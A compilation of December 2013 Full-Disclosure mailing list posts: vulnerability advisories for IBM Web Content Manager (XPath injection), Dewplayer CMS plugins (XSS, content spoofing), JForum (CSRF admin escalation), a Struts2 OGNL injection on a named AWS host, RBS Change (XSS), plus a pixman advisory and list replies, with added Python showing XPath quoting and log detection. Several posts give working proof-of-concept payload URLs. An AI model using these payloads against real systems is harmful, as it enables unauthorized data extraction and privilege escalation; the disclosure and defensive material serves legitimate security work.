[Full-disclosure] SEC Consult SA-20131227-0 :: IBM Web Content Manager (WCM) XPath Injection
SEC Consult Vulnerability Lab Security Advisory < 20131227-0 >
=======================================================================
title: XPath Injection
product: IBM Web Content Manager (WCM)
vulnerable version: 6.x, 7.x, 8.x
fixed version: -
impact: high
homepage: http://www.ibm.com/
found: 2013-10-27
CVE: CVE-2013-6735
by: A.Antukh, S.Temnikov
SEC Consult Vulnerability Lab
https://www.sec-consult.com
=======================================================================

Vendor description:
---
"IBM® Web Content Manager is designed to accelerate web content development and deployment through Internet, intranet and extranet sites. This software enables users to create and publish content while IT retains control. Through advanced personalization, IBM Web Content Manager delivers the right information to the right audience when needed, providing an exceptional customer experience"

Source: http://www-03.ibm.com/software/products/en/ibmwebcontmana

Business recommendation:
---
The discovered vulnerability can be exploited _without_ authentication and therefore poses a high security risk: it allows extraction of configuration data from the server. The impact of the XPath vulnerability has not been fully researched. SEC Consult suspects that it is possible to extract sensitive information that would be useful for further attacks.

The recommendation of SEC Consult is to immediately install the patches provided by the vendor.

Vulnerability overview/description:
---
A typical URL for a host with WCM installed looks like this:

http://[HOST]:[PORT]/wps/wcm/connect/[PATH]

The "connect" servlet provided in the standard installation of IBM Web Content Manager parses the PATH element as follows:

[PATH] = [LIBRARY]/[SITE_AREA_PATH]/[CONTENT]

Due to insufficient validation, the "LIBRARY" element suffers from an XPath injection vulnerability. An unauthenticated user is able to perform blind XPath injection attacks, e.g. obtain the current application configuration, enumerate nodes and extract other valuable information from vulnerable installations of Web Content Manager.
Proof of concept:
---
The vulnerability is exploited due to improper validation of the LIBRARY parameter, which is parsed by the "connect" servlet. The most basic cases are presented below and allow an attacker to manipulate the logic of the request. The "false" clause causes an error; the "true" clause (if not defined explicitly) redirects an attacker to the "/wcm/webinterface/login/login.jsp" page.

True clause:
http://[HOST]:[PORT]/wps/wcm/connect/' or 'a'='a

False clause:
http://[HOST]:[PORT]/wps/wcm/connect/' or 'a'='b

Knowing the difference between the responses of the true and false clauses, it is possible to manipulate requests in order to extract information. For example, if the following request returns TRUE, this would give an attacker information about the "name" property:

http://[HOST]:[PORT]/wps/wcm/connect/' or (@ibmcontentwcm:name = "pznDT") or 'a'='b

In a similar way, with use of the "jcr:like" and "jcr:contains" functions one can effectively restore the value of the "target" property.

Vulnerable / tested versions:
---
The vulnerability is verified to exist in the 7.0 and 8.0 versions of WCM, which are the most recent versions at the moment of writing the advisory.

Vendor contact timeline:
---
2013-12-04: Contacted vendor through ps...@vnet.ibm.com.
2013-12-04: Initial vendor response.
2013-12-06: Issues will be verified.
2013-12-20: Security bulletin released.
2013-12-27: SEC Consult releases coordinated security advisory.

Solution:
---
Apply the Interim Fix PI0
www.ibm.com/eserver/support/fixes/fixcentral/swg/quickorder?productid=WebSphere%20Portal&brandid=5&apar=PI0

Workaround:
---
No workaround available.
Advisory URL:
---
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm

~~~
SEC Consult Vulnerability Lab
SEC Consult
Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius

Headquarter:
Mooslackengasse 17, 1190 Vienna, Austria
Phone: +43 1 8903043 0
Fax: +43 1 8903043 15

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF A. Antukh / @2013

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
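Added illustration, not code from the advisory or from IBM WCM: a minimal model of the flaw class described above. It uses the connect-path layout the advisory gives ([LIBRARY]/[SITE_AREA_PATH]/[CONTENT]); the predicate shape, the library-name allow-list and the function names are assumptions for the demo. It shows how the raw LIBRARY segment rewrites an XPath predicate, and how an allow-list plus correct XPath literal quoting (concat() for values holding both quote kinds) closes that off.

```python
import re
from urllib.parse import unquote

# Path layout taken from the advisory: /wps/wcm/connect/[LIBRARY]/[SITE_AREA_PATH]/[CONTENT]
CONNECT_PREFIX = "/wps/wcm/connect/"
# Assumed allow-list for library names (letters, digits, space, '_', '-', '.'); not WCM's real rule.
LIBRARY_NAME = re.compile(r"^[A-Za-z0-9 _.\-]{1,128}$")


def split_connect_path(url_path):
    """Split a connect-servlet path into (library, site_area_path, content)."""
    if not url_path.startswith(CONNECT_PREFIX):
        raise ValueError("not a connect servlet path")
    parts = [unquote(p) for p in url_path[len(CONNECT_PREFIX):].split("/")]
    library = parts[0]
    content = parts[-1] if len(parts) > 1 else ""
    return library, "/".join(parts[1:-1]), content


def query_unsafe(library):
    """Vulnerable pattern (assumed predicate shape): the raw segment is
    concatenated into the query, so a quote in it closes the string literal
    and the remainder becomes part of the condition."""
    return "//library[@name='" + library + "']"


def xpath_literal(value):
    """Encode any string as an XPath 1.0 string literal. XPath has no escape
    character, so a value holding both quote kinds is built with concat()."""
    if "'" not in value:
        return "'" + value + "'"
    if '"' not in value:
        return '"' + value + '"'
    parts = ["'" + p + "'" for p in value.split("'")]
    return "concat(" + ", \"'\", ".join(parts) + ")"


def is_valid_library(library):
    """Allow-list check on the decoded LIBRARY segment."""
    return bool(LIBRARY_NAME.match(library))


def query_safe(library):
    """Hardened pattern: reject anything outside the allow-list, then quote the
    value as a literal so it can never terminate the predicate."""
    if not is_valid_library(library):
        raise ValueError("rejected library name: %r" % library)
    return "//library[@name=" + xpath_literal(library) + "]"
```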
[Full-disclosure] Vulnerabilities in plugins for WordPress, Joomla and Plone with Dewplayer
Hello list!

These are Content Spoofing and Cross-Site Scripting vulnerabilities in plugins for WordPress, Joomla and Plone with Dewplayer.

Earlier I wrote about vulnerabilities in Dewplayer (http://seclists.org/fulldisclosure/2013/Dec/192). This is a media player which is used at thousands of web sites and in multiple web applications. There are nearly 422 000 web sites with dewplayer.swf in Google's index. And that is just one file name; there are other file names of this player (such as dewplayer-en.swf and others).

This flash media player is used in the following plugins: Dewplayer WordPress plugin, JosDewplayer and mosdewplayer for Joomla and collective.dewplayer for Plone. There can also be other plugins with Dewplayer.

----------
Affected products:
----------

The following web applications are vulnerable: Dewplayer WordPress plugin 1.2 and previous versions, JosDewplayer 2.0 and previous versions, all versions of mosdewplayer, collective.dewplayer 1.2 and previous versions. Web applications which are using Dewplayer 2.2.2 and previous versions are vulnerable.

----------
Affected vendors:
----------

Plugins for different CMS with Dewplayer:
http://wordpress.org/extend/plugins/dewplayer-flash-mp3-player/
http://extensions.joomla.org/extensions/multimedia/audio-players-a-gallery/4779
http://plone.org/products/collective.dewplayer

----------
Details:
----------

These are examples of some vulnerabilities in Dewplayer; examples of all CS and XSS vulnerabilities can be found in the above-mentioned advisory.

Dewplayer for WordPress:

The plugin contains the following flash files: dewplayer.swf, dewplayer-mini.swf, dewplayer-multi.swf. All of them have CS holes.
Content Spoofing (Content Injection) (WASC-12):

http://site/wp-content/plugins/dewplayer-flash-mp3-player/dewplayer.swf?mp3=1.mp3
http://site/wp-content/plugins/dewplayer-flash-mp3-player/dewplayer.swf?file=1.mp3
http://site/wp-content/plugins/dewplayer-flash-mp3-player/dewplayer.swf?sound=1.mp3
http://site/wp-content/plugins/dewplayer-flash-mp3-player/dewplayer.swf?son=1.mp3

Full path disclosure (WASC-13):

http://site/wp-content/plugins/dewplayer-flash-mp3-player/dewplayer.php

JosDewplayer and mosdewplayer:

The plugin JosDewplayer is based on mosdewplayer, so the holes must be similar in them. The plugin contains the following flash files: dewplayer.swf, dewplayer-multi.swf, dewplayer-playlist.swf, dewplayer-rect.swf. All of them have CS holes.

http://site/plugins/content/josdewplayer/dewplayer.swf

collective.dewplayer:

The plugin contains the following flash files: dewplayer-mini.swf, dewplayer.swf, dewplayer-multi.swf, dewplayer-rect.swf, dewplayer-playlist.swf, dewplayer-bubble.swf, dewplayer-vinyl.swf. All of these flash files have CS holes and dewplayer-vinyl.swf also has XSS holes. The path at the web site can be different:

http://site/files/++resource++collective.dewplayer/dewplayer.swf

Content Spoofing (Content Injection) (WASC-12):

http://site/path/dewplayer.swf?mp3=1.mp3

XSS (WASC-08):

http://site/path/dewplayer-vinyl.swf?xml=xss.xml

xss.xml:

javascript:alert(document.cookie)
XSS

----------
Timeline:
----------

2013.10.25 - announced at my site.
2013.10.26 - informed developers.
2013.12.19 - disclosed at my site about Dewplayer.
2013.12.24 - disclosed at my site about plugins (http://websecurity.com.ua/6931/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
Re: [Full-disclosure] Happy Holidays / Xmas Advisory
And it just so kindly tells you where everything is located, just in case you wanted to know.

Ex: http://demo.fatfreecrm.com/passwords/

I half expected to find password hashes but oh well, that's life. It is a great "hack me" application when you can find random vulns simply by dicking around on your phone.

> On Dec 26, 2013 3:56 AM, "PsychoBilly" wrote:
>>
>> [[ Henri Salo ]] @ [[ 24/12/2013 18:33 ]]--
>> > On Tue, Dec 24, 2013 at 11:26:15AM +0100, joernchen wrote:
>> >> A rather informal advisory on Fat Free CRM (http://fatfreecrm.com/):
>> >
>> > I created https://github.com/fatfreecrm/fat_free_crm/issues/300 for tracking.
>> >
>> > ---
>> > Henri Salo
>> >
>> I really like the full user db listing "feature"
>> view-source:http://demo.fatfreecrm.com/login
Re: [Full-disclosure] Happy Holidays / Xmas Advisory
That is the obvious way to reduce DB calls when authenticating. Duh.

On 12/26/2013 03:55 AM, PsychoBilly wrote:
> [[ Henri Salo ]] @ [[ 24/12/2013 18:33 ]]--
>> On Tue, Dec 24, 2013 at 11:26:15AM +0100, joernchen wrote:
>>> A rather informal advisory on Fat Free CRM (http://fatfreecrm.com/):
>> I created https://github.com/fatfreecrm/fat_free_crm/issues/300 for tracking.
>>
>> ---
>> Henri Salo
>>
> I really like the full user db listing "feature"
> view-source:http://demo.fatfreecrm.com/login
[Full-disclosure] [CVE-2013-7209]JForum CSRF(Cross-site request forgery) Vulnerability
Version: All
Vulnerability: Cross-site request forgery
Problem type: remote
CVE ID: CVE-2013-7209

The JForum admin module's "modify user permissions" function has a CSRF vulnerability. Put the following code into a JForum forum post; as soon as an administrator opens this post, the permissions of the user with id 12696 will be escalated to the permissions of the group with id 2 (the default group with id 2 is the administrator group).

Code:

http://www.target.com/forum/admBase/login.page?action=groupsSave&module=adminUsers&user_id=12696&groups=2 width=0 />

Code Description:

http://www.target.com/forum/ - the JForum forum address
12696 - the user id
2 - the group id
width=0 is used to hide the pic

It was discovered by arno @dbappsecurity.com.cn
[Full-disclosure] [Wooyun]Amazon elasticbeanstalk code execution
*From:* http://en.wooyun.org/bugs/wooyun-2013-040

*Abstract:*
AWS Elastic Beanstalk is an even easier way for you to quickly deploy and manage applications in the AWS cloud. An elasticbeanstalk subdomain has a Struts2 code execution vulnerability.

*Details:*
PoC, returns [/ok]:
http://jewelopoly.elasticbeanstalk.com/login.action?redirect:${%23w%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse').getWriter(),%23w.println('[/ok]'),%23w.flush(),%23w.close()}

--
WooYun, an Open and Free Vulnerability Reporting Platform
For more information, please visit http://en.wooyun.org/about.php
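Added log-triage example, not from either report, serving both the SEC Consult WCM advisory above and this Struts2 report: it flags connect-servlet requests whose LIBRARY segment carries XPath syntax, and .action requests whose query uses the Struts2 redirect:/redirectAction: parameter prefix followed by an OGNL expression. The log lines are constructed, and the metacharacter heuristic and tag names are assumptions for the demo.

```python
import re
from urllib.parse import unquote

# Constructed sample log (combined-format prefix), not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [27/Dec/2013:10:01:02 +0000] "GET /wps/wcm/connect/Web%20Content/Home/Welcome HTTP/1.1" 200 5120
203.0.113.5 - - [27/Dec/2013:10:01:09 +0000] "GET /wps/wcm/connect/'%20or%20'a'='a HTTP/1.1" 302 0
203.0.113.5 - - [27/Dec/2013:10:01:11 +0000] "GET /wps/wcm/connect/'%20or%20(@ibmcontentwcm:name%20=%20%22pznDT%22)%20or%20'a'='b HTTP/1.1" 500 812
198.51.100.7 - - [27/Dec/2013:10:02:30 +0000] "GET /login.action?redirect:${%23w%3d%23context.get('x')} HTTP/1.1" 200 4
198.51.100.7 - - [27/Dec/2013:10:02:31 +0000] "GET /login.action?username=bob HTTP/1.1" 200 2048
"""

REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) ')
WCM_PREFIX = "/wps/wcm/connect/"
# Quote, bracket, parenthesis and attribute characters, or a jcr: function,
# do not belong in a library name; an assumed heuristic, not IBM's rule.
XPATH_META = re.compile(r'''['"\[\]()@]|jcr:''')
# Struts2 parameter-name prefixes evaluated as OGNL; the ${ marks an expression.
OGNL_REDIRECT = re.compile(r"[?&]redirect(?:Action)?:[^&]*\$\{", re.IGNORECASE)


def classify_request(target):
    """Return detection tags for one request target (URL-decoded here)."""
    decoded = unquote(target)
    tags = []
    if decoded.startswith(WCM_PREFIX):
        # First segment after the prefix is the LIBRARY element.
        library = decoded[len(WCM_PREFIX):].split("/", 1)[0]
        if XPATH_META.search(library):
            tags.append("wcm-xpath-syntax")
    if OGNL_REDIRECT.search(decoded):
        tags.append("struts2-redirect-ognl")
    return tags


def scan_log(text):
    """Return (client_ip, target, tags) for every flagged request line."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        ip, target = m.groups()
        tags = classify_request(target)
        if tags:
            hits.append((ip, target, tags))
    return hits
```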
[Full-disclosure] RBS Change v3.6.8 XSS Vulnerability
Hi guys,

You can find the software affected at
http://www.rbschange.fr/addons/distributions/RBS-Change-Core,51422.html

Thanks,
Metropolis

###
#
# Script Name : RBS Change
#
# Version : v3.6.8
#
# Bug Type : XSS vulnerability
#
# Found by : Metropolis
#
# Home : http://metropolis.fr.cr
#
# Discovered : 25/12/2013
#
# Download app : http://www.rbschange.fr/addons/distributions/RBS-Change-Core,51422.html
#
# Google search : Propulsé par RBS Change
#
###

PoC:
http://[target]/[path]/fr/website/Resultat-de-recherche,12470.html?solrsearchParam[terms]=[XSS]

Example:
http://[target]/[path]/fr/website/Resultat-de-recherche,12470.html?solrsearchParam[terms]=1";>alert(31337);

Local example:
http://localhost/demo/fr/website/Resultat-de-recherche,12470.html?solrsearchParam[terms]=1";>alert(31337);
[Full-disclosure] [ MDVSA-2013:302 ] pixman
___
Mandriva Linux Security Advisory MDVSA-2013:302
http://www.mandriva.com/en/support/security/
___

Package : pixman
Date: December 23, 2013
Affected: Business Server 1.0, Enterprise Server 5.0
___

Problem Description:

Updated pixman package fixes security vulnerability:

Bryan Quigley discovered an integer underflow in pixman. If a user were tricked into opening a specially crafted file, an attacker could cause a denial of service via application crash (CVE-2013-6425).
___

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6425
http://advisories.mageia.org/MGASA-2013-0366.html
___

Updated Packages:

(md5 checksum and package listing for Mandriva Enterprise Server 5, Mandriva Enterprise Server 5/X86_64 and Mandriva Business Server 1/X86_64 omitted)
___

To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security.
You can obtain the GPG public key of the Mandriva Security Team by executing:

gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

http://www.mandriva.com/en/support/security/advisories/

If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
___

Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
Re: [Full-disclosure] Happy Holidays / Xmas Advisory
[[ Henri Salo ]] @ [[ 24/12/2013 18:33 ]]--
> On Tue, Dec 24, 2013 at 11:26:15AM +0100, joernchen wrote:
>> A rather informal advisory on Fat Free CRM (http://fatfreecrm.com/):
>
> I created https://github.com/fatfreecrm/fat_free_crm/issues/300 for tracking.
>
> ---
> Henri Salo
>
I really like the full user db listing "feature"
view-source:http://demo.fatfreecrm.com/login